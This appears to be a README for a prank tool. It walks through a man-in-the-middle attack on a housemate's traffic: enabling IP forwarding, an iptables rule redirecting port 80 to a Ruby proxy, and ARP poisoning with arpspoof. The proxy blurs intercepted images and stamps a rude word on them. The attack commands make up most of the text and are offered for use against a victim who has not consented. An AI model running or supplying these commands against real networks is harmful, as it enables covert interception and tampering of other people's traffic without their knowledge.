So. One of my housemates pranked me, and I decided to get my revenge. My revenge was 100% inspired by upside-down-ternet, and goes as follows:
- Linux box running the ruby script below, which acts as a transparent proxy
- iptables rules on the linux box route all port 80 requests through the proxy
- arp poisoning routes all of the victim's traffic through the linux box
- Proxy isn't actually transparent. It intercepts requests for images, and does some processing on them, blurring them and writing a rude word in the middle.
- Hilarity and confusion ensues.
- Put
proxy.rb
somewhere on your linux box/VM - Install ImageMagick using your favourite method (you might also need to install some gscript fonts)
- Install the necessary gems:
gem install eventmachine mini_magick dimensions
- Install the
arpspoof
tool, which might be in a package calleddnsniff
- Enabling IP forwarding with
echo 1 > /proc/sys/net/ipv4/ip_forward
- Route all port 80 traffic through the proxy with
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
(assuming that the proxy runs on port 8080) - Start the proxy:
ruby proxy.rb
- Start ARP poisoning:
arpspoof -i <eth device> [-t <target IP address>] <router IP address>
This software is entirely experimental and not entirely stable. Don't be too surprised if it crashes, is inefficient, etc. Also, it will rape your computer -- the blurring especially takes lots of CPU cycles.
It can't handle anything that isn't over HTTP. If they're using HTTPS, you're fecked.
Also, make sure your target doesn't get scared to the point of re-installing their OS ><